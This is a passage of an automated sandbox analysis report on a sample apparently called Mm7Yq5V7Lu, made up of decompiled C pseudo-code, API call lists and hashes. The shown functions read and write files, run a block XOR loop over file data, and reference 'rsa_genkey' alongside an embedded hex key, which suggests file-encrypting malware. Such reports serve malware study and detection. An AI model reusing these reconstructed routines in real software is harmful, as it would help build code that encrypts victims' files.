                                                                                                                                                        0x00408cc4
                                                                                                                                                        0x00408cc6
                                                                                                                                                        0x00408ccb
                                                                                                                                                        0x00408cd1
                                                                                                                                                        0x00408cd5
                                                                                                                                                        0x00408cd6
                                                                                                                                                        0x00408cd9
                                                                                                                                                        0x00408cdc
                                                                                                                                                        0x00408cde
                                                                                                                                                        0x00408ce3
                                                                                                                                                        0x00408ce4
                                                                                                                                                        0x00408ce7
                                                                                                                                                        0x00408ce7
                                                                                                                                                        0x00408cec
                                                                                                                                                        0x00408cef
                                                                                                                                                        0x00408cf2
                                                                                                                                                        0x00408cf5
                                                                                                                                                        0x00408cf8
                                                                                                                                                        0x00408cf8
                                                                                                                                                        0x00408d03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408d03

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00408AC1: SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000020,?,?,00000000,00408FC2,00000000,00000001,00000001,00000002,00000000,?,00000020), ref: 00408ADE
                                                                                                                                                          • Part of subcall function 00408AC1: GetLastError.KERNEL32(?,?,00000000,00408FC2,00000000,00000001,00000001,00000002,00000000,?,00000020,?,?,00000100,00000020,?), ref: 00408AE8
                                                                                                                                                          • Part of subcall function 00402779: GetProcessHeap.KERNEL32(00000000,?,00409C7C,00000020,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000,?,?,?,?,00409F25), ref: 0040277F
                                                                                                                                                          • Part of subcall function 00402779: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,00409F25), ref: 00402786
                                                                                                                                                        • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,?), ref: 00408C9F
                                                                                                                                                        • _allrem.NTDLL(00000000,00000000,00000002,00000000), ref: 00408CBF
                                                                                                                                                        • _allrem.NTDLL(?,?,00000002,00000000), ref: 00408D1A
                                                                                                                                                        • WriteFile.KERNELBASE(?,00000000,?,?,00000000,?,?,?,00000000), ref: 00408D61
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Heap_allrem$AllocateErrorLastPointerProcessReadWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3878957792-0
                                                                                                                                                        • Opcode ID: cdf076be42ce5679af40aa4617636a7b87a908b855d0424bd095ea74ef93dd04
                                                                                                                                                        • Instruction ID: 2cc183211c3faa43abaf3287a87dca96e67a220787a3862470d9a69e630af201
                                                                                                                                                        • Opcode Fuzzy Hash: cdf076be42ce5679af40aa4617636a7b87a908b855d0424bd095ea74ef93dd04
                                                                                                                                                        • Instruction Fuzzy Hash: CE41A076A00108BBEF109F95DD42F9E3B2AEF58344F00413EFE44B61D1DA799D609BA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00409CA0,00001000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000200,00000000,00000000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000), ref: 0040279E
                                                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00409F25), ref: 004027A5
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00409CA0,00001000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000200,00000000,00000000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000), ref: 004027AE
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,00409F25), ref: 004027B5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$Process$AllocAllocate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1154092256-0
                                                                                                                                                        • Opcode ID: 6779cbea1dbedfc19be7573f5352eb0543ddd73af7a780d1975b72d8babafba0
                                                                                                                                                        • Instruction ID: 5852a7c1cb447326913f1162adb254554880470761526fac5e3da6bafc4e8daa
                                                                                                                                                        • Opcode Fuzzy Hash: 6779cbea1dbedfc19be7573f5352eb0543ddd73af7a780d1975b72d8babafba0
                                                                                                                                                        • Instruction Fuzzy Hash: ECD09E75515281FBDE015BA0DF0DB4A7EA5BB84703F008464F289E24F0C7745080DF29
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 355 409f2e-409f69 call 402647 call 403feb 360 409fa9 355->360 361 409f6b-409f80 lstrlenA 355->361 364 409fab-409fb1 360->364 362 409f82-409f94 WriteFile 361->362 363 409fa4 361->363 365 409f96-409f9d 362->365 366 409f9f-409fa2 362->366 363->360 365->363 365->366 366->364
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00409F2E(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12, void* _a16) {
                                                                                                                                                        				char _v8;
                                                                                                                                                        				long _v12;
                                                                                                                                                        				struct _OVERLAPPED* _t19;
                                                                                                                                                        				int _t22;
                                                                                                                                                        				struct _OVERLAPPED* _t26;
                                                                                                                                                        				void* _t30;
                                                                                                                                                        				int _t34;
                                                                                                                                                        				long _t35;
                                                                                                                                                        
                                                                                                                                                        				_t30 = _a16;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				E00402647(_t30, 0, 0x9b4);
                                                                                                                                                        				_t26 = E00403FEB(_a4, _a8, _t30, 0x9b2,  &_v8);
                                                                                                                                                        				if(_t26 != 0) {
                                                                                                                                                        					L6:
                                                                                                                                                        					_t19 = _t26;
                                                                                                                                                        				} else {
                                                                                                                                                        					_t34 = lstrlenA(_t30);
                                                                                                                                                        					 *((short*)(_t34 + _t30)) = 0xa0d;
                                                                                                                                                        					_t35 = _t34 + 2;
                                                                                                                                                        					if(_a12 == _t26) {
                                                                                                                                                        						L5:
                                                                                                                                                        						 *((char*)(_t35 + _t30 - 2)) = 0;
                                                                                                                                                        						goto L6;
                                                                                                                                                        					} else {
                                                                                                                                                        						_t22 = WriteFile(_a12, _t30, _t35,  &_v12, _t26); // executed
                                                                                                                                                        						if(_t22 == 0 || _v12 != _v8 + 1) {
                                                                                                                                                        							_t19 = 0xfffffffe;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L5;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				return _t19;
                                                                                                                                                        			}











                                                                                                                                                        0x00409f36
                                                                                                                                                        0x00409f42
                                                                                                                                                        0x00409f45
                                                                                                                                                        0x00409f48
                                                                                                                                                        0x00409f65
                                                                                                                                                        0x00409f69
                                                                                                                                                        0x00409fa9
                                                                                                                                                        0x00409fa9
                                                                                                                                                        0x00409f6b
                                                                                                                                                        0x00409f72
                                                                                                                                                        0x00409f74
                                                                                                                                                        0x00409f7a
                                                                                                                                                        0x00409f80
                                                                                                                                                        0x00409fa4
                                                                                                                                                        0x00409fa4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409f82
                                                                                                                                                        0x00409f8c
                                                                                                                                                        0x00409f94
                                                                                                                                                        0x00409fa1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409f94
                                                                                                                                                        0x00409f80
                                                                                                                                                        0x00409fb1

                                                                                                                                                        APIs
                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?,000009B2,004069E5,00000000,?,004069E5,?,rsa_genkey,00000000), ref: 00409F6C
                                                                                                                                                        • WriteFile.KERNELBASE(?,?,-00000002,?,00000000), ref: 00409F8C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWritelstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 427699356-0
                                                                                                                                                        • Opcode ID: a98bba74558a5c3056b2674f0ac8643432a6fa11e9474b80a733f2e18d31f0e2
                                                                                                                                                        • Instruction ID: 54ad5e530886b568676c8f74d91a72cf1c9ce57aaf57e1d934015ee7ef22b5ca
                                                                                                                                                        • Opcode Fuzzy Hash: a98bba74558a5c3056b2674f0ac8643432a6fa11e9474b80a733f2e18d31f0e2
                                                                                                                                                        • Instruction Fuzzy Hash: 3E01A1B190424ABFDB108F55DD85EABBBBCEF44314F10053AF905E3291E7769D50C664
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 367 408ac1-408ae6 SetFilePointerEx 368 408ae8-408af0 GetLastError 367->368 369 408af9-408afc 367->369 368->369 370 408af2-408af7 368->370 371 408aff-408b02 369->371 370->371
                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                        			E00408AC1(void* __ecx, signed int __edx, void* _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				void* _v12;
                                                                                                                                                        				int _t13;
                                                                                                                                                        				signed int _t18;
                                                                                                                                                        
                                                                                                                                                        				_t18 = __edx;
                                                                                                                                                        				_push(_a16);
                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                        				_t13 = SetFilePointerEx(_a4, _a8, _a12,  &_v12); // executed
                                                                                                                                                        				if(_t13 != 0 || GetLastError() == 0) {
                                                                                                                                                        					return _v12;
                                                                                                                                                        				} else {
                                                                                                                                                        					return _t18 | 0xffffffff;
                                                                                                                                                        				}
                                                                                                                                                        			}







                                                                                                                                                        0x00408ac1
                                                                                                                                                        0x00408ac6
                                                                                                                                                        0x00408ac9
                                                                                                                                                        0x00408ad0
                                                                                                                                                        0x00408ade
                                                                                                                                                        0x00408ae6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408af2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408af5

                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000020,?,?,00000000,00408FC2,00000000,00000001,00000001,00000002,00000000,?,00000020), ref: 00408ADE
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00408FC2,00000000,00000001,00000001,00000002,00000000,?,00000020,?,?,00000100,00000020,?), ref: 00408AE8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                        • Opcode ID: 6e0f3bee703c3869b65818b820fbb332b971552401367e0e72a539c0dd756b21
                                                                                                                                                        • Instruction ID: 9e9dc8dbb341af1bb04810b11092993825fea884a061efd2081aeac946e0e104
                                                                                                                                                        • Opcode Fuzzy Hash: 6e0f3bee703c3869b65818b820fbb332b971552401367e0e72a539c0dd756b21
                                                                                                                                                        • Instruction Fuzzy Hash: D8F0123160010CAFDF11CF95CD45BAE7B79EB00311F144269F850A5591DB719D60AB59
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 373 402779-40278c GetProcessHeap RtlAllocateHeap
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00402779(long _a4) {
                                                                                                                                                        				void* _t3;
                                                                                                                                                        
                                                                                                                                                        				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                        				return _t3;
                                                                                                                                                        			}




                                                                                                                                                        0x00402786
                                                                                                                                                        0x0040278c

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00409C7C,00000020,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000,?,?,?,?,00409F25), ref: 0040277F
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,00409F25), ref: 00402786
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                                        • Opcode ID: 3bcb6114527cd6441543e4c11c1bae5e6f4e3846f7b8bdffe296e45153ba5e1e
                                                                                                                                                        • Instruction ID: 4a7994f7ef45bc7a8219c9d28fca82bdd4d35cf445d776cf722a1a9087f68053
                                                                                                                                                        • Opcode Fuzzy Hash: 3bcb6114527cd6441543e4c11c1bae5e6f4e3846f7b8bdffe296e45153ba5e1e
                                                                                                                                                        • Instruction Fuzzy Hash: B3B00275555280ABDE415BE19F1DB497A65BB44703F004454F389D58B0C6754450DF15
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                        			E0040894F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a24) {
                                                                                                                                                        				void* _v15;
                                                                                                                                                        				char _v16;
                                                                                                                                                        				void* _v31;
                                                                                                                                                        				void _v32;
                                                                                                                                                        				long _v36;
                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                        				void* _t46;
                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                        				void* _t58;
                                                                                                                                                        				void* _t61;
                                                                                                                                                        				long* _t63;
                                                                                                                                                        				long* _t64;
                                                                                                                                                        
                                                                                                                                                        				_t63 =  &_v36;
                                                                                                                                                        				_v32 = 0;
                                                                                                                                                        				_v36 = _v36 & 0x00000000;
                                                                                                                                                        				asm("stosd");
                                                                                                                                                        				_t48 = _a8;
                                                                                                                                                        				_t61 = _a24;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				asm("stosd");
                                                                                                                                                        				asm("stosd");
                                                                                                                                                        				asm("stosw");
                                                                                                                                                        				asm("stosb");
                                                                                                                                                        				asm("stosd");
                                                                                                                                                        				asm("stosd");
                                                                                                                                                        				asm("stosd");
                                                                                                                                                        				asm("stosw");
                                                                                                                                                        				asm("stosb");
                                                                                                                                                        				_t28 = _a12;
                                                                                                                                                        				_t55 = _t48;
                                                                                                                                                        				if(_t28 > 0) {
                                                                                                                                                        					_t46 = _a4 -  &_v32;
                                                                                                                                                        					_t58 = 0;
                                                                                                                                                        					do {
                                                                                                                                                        						E00402625( &_v16, _t55, 0x10);
                                                                                                                                                        						_t64 =  &(_t63[3]);
                                                                                                                                                        						E00402C2F(_a16, 0, _t55,  &_v32);
                                                                                                                                                        						_t51 = 0;
                                                                                                                                                        						do {
                                                                                                                                                        							 *( &_v32 + _t51) =  *( &_v32 + _t51) ^  *(_t46 +  &_v32 + _t51);
                                                                                                                                                        							_t51 = _t51 + 1;
                                                                                                                                                        						} while (_t51 < 0x10);
                                                                                                                                                        						if(_t61 == 0) {
                                                                                                                                                        							E00402625(_a8 + _t58,  &_v32, 0x10);
                                                                                                                                                        							_t64 =  &(_t64[3]);
                                                                                                                                                        						} else {
                                                                                                                                                        							WriteFile(_t61,  &_v32, 0x10,  &_v36, 0); // executed
                                                                                                                                                        						}
                                                                                                                                                        						E00402625(_a4,  &_v16, 0x10);
                                                                                                                                                        						_t28 = _a12;
                                                                                                                                                        						_t58 = _t58 + 0x10;
                                                                                                                                                        						_t63 =  &(_t64[3]);
                                                                                                                                                        						_t55 = _t55 + 0x10;
                                                                                                                                                        					} while (_t58 < _t28);
                                                                                                                                                        					_t48 = _a8;
                                                                                                                                                        				}
                                                                                                                                                        				if(_t61 == 0) {
                                                                                                                                                        					 *((char*)(_t48 + _t28)) = 0;
                                                                                                                                                        					return _t28;
                                                                                                                                                        				}
                                                                                                                                                        				return _t28;
                                                                                                                                                        			}

















                                                                                                                                                        0x0040894f
                                                                                                                                                        0x00408954
                                                                                                                                                        0x0040895f
                                                                                                                                                        0x00408964
                                                                                                                                                        0x00408965
                                                                                                                                                        0x00408969
                                                                                                                                                        0x0040896d
                                                                                                                                                        0x00408972
                                                                                                                                                        0x00408973
                                                                                                                                                        0x00408974
                                                                                                                                                        0x00408976
                                                                                                                                                        0x0040897d
                                                                                                                                                        0x0040897e
                                                                                                                                                        0x0040897f
                                                                                                                                                        0x00408980
                                                                                                                                                        0x00408982
                                                                                                                                                        0x00408983
                                                                                                                                                        0x00408987
                                                                                                                                                        0x0040898b
                                                                                                                                                        0x0040899b
                                                                                                                                                        0x0040899d
                                                                                                                                                        0x0040899f
                                                                                                                                                        0x004089a7
                                                                                                                                                        0x004089ac
                                                                                                                                                        0x004089bb
                                                                                                                                                        0x004089c0
                                                                                                                                                        0x004089c2
                                                                                                                                                        0x004089cb
                                                                                                                                                        0x004089cd
                                                                                                                                                        0x004089ce
                                                                                                                                                        0x004089d5
                                                                                                                                                        0x004089fc
                                                                                                                                                        0x00408a01
                                                                                                                                                        0x004089d7
                                                                                                                                                        0x004089e6
                                                                                                                                                        0x004089e6
                                                                                                                                                        0x00408a0f
                                                                                                                                                        0x00408a14
                                                                                                                                                        0x00408a18
                                                                                                                                                        0x00408a1b
                                                                                                                                                        0x00408a1e
                                                                                                                                                        0x00408a21
                                                                                                                                                        0x00408a29
                                                                                                                                                        0x00408a2e
                                                                                                                                                        0x00408a33
                                                                                                                                                        0x00408a35
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408a35
                                                                                                                                                        0x00408a3c

                                                                                                                                                        APIs
                                                                                                                                                        • WriteFile.KERNELBASE(?,?,00000010,00000000,00000000,?,00000000,?,?), ref: 004089E6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                        • Opcode ID: 12e31d0b84c8ab0b0659c7ada185b5ffaff09a6f0e08dda8b338922cb69e6604
                                                                                                                                                        • Instruction ID: 8776945e4b94759668e42047d0e26b6a9d4df8cc7d07ef1d092c1786444b0bac
                                                                                                                                                        • Opcode Fuzzy Hash: 12e31d0b84c8ab0b0659c7ada185b5ffaff09a6f0e08dda8b338922cb69e6604
                                                                                                                                                        • Instruction Fuzzy Hash: 9521C5722083447FD310DA69CD44F5BBBE9EB89744F44083EF6C5E2191DAB5D9088B67
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00409333(WCHAR* _a4) {
                                                                                                                                                        				long _t4;
                                                                                                                                                        
                                                                                                                                                        				_t4 = GetFileAttributesW(_a4); // executed
                                                                                                                                                        				return 0 | _t4 != 0xffffffff;
                                                                                                                                                        			}




                                                                                                                                                        0x00409337
                                                                                                                                                        0x00409347

                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000,00409DB2,00000000), ref: 00409337
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: e2b3392cc75644febd763fcfa4f93dcd3157184663d70220e0e33429e85fe5c6
                                                                                                                                                        • Instruction ID: 1a6f0cd51294669112842f7d3da47c4c29e32ab2cedef51e567441d72244e30f
                                                                                                                                                        • Opcode Fuzzy Hash: e2b3392cc75644febd763fcfa4f93dcd3157184663d70220e0e33429e85fe5c6
                                                                                                                                                        • Instruction Fuzzy Hash: 08B012762100004BC70807349D5E45E75546F54731720873DB177D04F0D730CCB0FA04
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E004023D5(long _a4) {
                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				short* _v32;
                                                                                                                                                        				void _v36;
                                                                                                                                                        				void* _t57;
                                                                                                                                                        				signed int _t58;
                                                                                                                                                        				signed int _t61;
                                                                                                                                                        				signed int _t62;
                                                                                                                                                        				void* _t63;
                                                                                                                                                        				signed int* _t68;
                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                        				intOrPtr* _t71;
                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                        				void* _t76;
                                                                                                                                                        				signed int _t77;
                                                                                                                                                        				void* _t78;
                                                                                                                                                        				void _t80;
                                                                                                                                                        				signed int _t81;
                                                                                                                                                        				signed int _t84;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				short* _t87;
                                                                                                                                                        				void* _t89;
                                                                                                                                                        				signed int* _t90;
                                                                                                                                                        				long _t91;
                                                                                                                                                        				signed int _t93;
                                                                                                                                                        				signed int _t94;
                                                                                                                                                        				signed int _t100;
                                                                                                                                                        				signed int _t102;
                                                                                                                                                        				void* _t104;
                                                                                                                                                        				long _t108;
                                                                                                                                                        				signed int _t110;
                                                                                                                                                        
                                                                                                                                                        				_t108 = _a4;
                                                                                                                                                        				_t76 =  *(_t108 + 8);
                                                                                                                                                        				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                        					L3:
                                                                                                                                                        					return 0;
                                                                                                                                                        				}
                                                                                                                                                        				_a4 =  *[fs:0x4];
                                                                                                                                                        				_v8 =  *[fs:0x8];
                                                                                                                                                        				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                        					_t102 =  *(_t108 + 0xc);
                                                                                                                                                        					__eflags = _t102 - 0xffffffff;
                                                                                                                                                        					if(_t102 != 0xffffffff) {
                                                                                                                                                        						_t91 = 0;
                                                                                                                                                        						__eflags = 0;
                                                                                                                                                        						_a4 = 0;
                                                                                                                                                        						_t57 = _t76;
                                                                                                                                                        						do {
                                                                                                                                                        							_t80 =  *_t57;
                                                                                                                                                        							__eflags = _t80 - 0xffffffff;
                                                                                                                                                        							if(_t80 == 0xffffffff) {
                                                                                                                                                        								goto L9;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t80 - _t91;
                                                                                                                                                        							if(_t80 >= _t91) {
                                                                                                                                                        								L20:
                                                                                                                                                        								_t63 = 0;
                                                                                                                                                        								L60:
                                                                                                                                                        								return _t63;
                                                                                                                                                        							}
                                                                                                                                                        							L9:
                                                                                                                                                        							__eflags =  *(_t57 + 4);
                                                                                                                                                        							if( *(_t57 + 4) != 0) {
                                                                                                                                                        								_t12 =  &_a4;
                                                                                                                                                        								 *_t12 = _a4 + 1;
                                                                                                                                                        								__eflags =  *_t12;
                                                                                                                                                        							}
                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                        							_t57 = _t57 + 0xc;
                                                                                                                                                        							__eflags = _t91 - _t102;
                                                                                                                                                        						} while (_t91 <= _t102);
                                                                                                                                                        						__eflags = _a4;
                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                        							L15:
                                                                                                                                                        							_t81 =  *0x40ca40; // 0x0
                                                                                                                                                        							_t110 = _t76 & 0xfffff000;
                                                                                                                                                        							_t58 = 0;
                                                                                                                                                        							__eflags = _t81;
                                                                                                                                                        							if(_t81 <= 0) {
                                                                                                                                                        								L18:
                                                                                                                                                        								_t104 = _t102 | 0xffffffff;
                                                                                                                                                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                        								__eflags = _t61;
                                                                                                                                                        								if(_t61 < 0) {
                                                                                                                                                        									_t62 = 0;
                                                                                                                                                        									__eflags = 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t62 = _a4;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t62;
                                                                                                                                                        								if(_t62 == 0) {
                                                                                                                                                        									L59:
                                                                                                                                                        									_t63 = _t104;
                                                                                                                                                        									goto L60;
                                                                                                                                                        								} else {
                                                                                                                                                        									__eflags = _v12 - 0x1000000;
                                                                                                                                                        									if(_v12 != 0x1000000) {
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _v16 & 0x000000cc;
                                                                                                                                                        									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                        										L46:
                                                                                                                                                        										_t63 = 1;
                                                                                                                                                        										 *0x40ca88 = 1;
                                                                                                                                                        										__eflags =  *0x40ca88;
                                                                                                                                                        										if( *0x40ca88 != 0) {
                                                                                                                                                        											goto L60;
                                                                                                                                                        										}
                                                                                                                                                        										_t84 =  *0x40ca40; // 0x0
                                                                                                                                                        										__eflags = _t84;
                                                                                                                                                        										_t93 = _t84;
                                                                                                                                                        										if(_t84 <= 0) {
                                                                                                                                                        											L51:
                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                        											if(_t93 != 0) {
                                                                                                                                                        												L58:
                                                                                                                                                        												 *0x40ca88 = 0;
                                                                                                                                                        												goto L5;
                                                                                                                                                        											}
                                                                                                                                                        											_t77 = 0xf;
                                                                                                                                                        											__eflags = _t84 - _t77;
                                                                                                                                                        											if(_t84 <= _t77) {
                                                                                                                                                        												_t77 = _t84;
                                                                                                                                                        											}
                                                                                                                                                        											_t94 = 0;
                                                                                                                                                        											__eflags = _t77;
                                                                                                                                                        											if(_t77 < 0) {
                                                                                                                                                        												L56:
                                                                                                                                                        												__eflags = _t84 - 0x10;
                                                                                                                                                        												if(_t84 < 0x10) {
                                                                                                                                                        													_t86 = _t84 + 1;
                                                                                                                                                        													__eflags = _t86;
                                                                                                                                                        													 *0x40ca40 = _t86;
                                                                                                                                                        												}
                                                                                                                                                        												goto L58;
                                                                                                                                                        											} else {
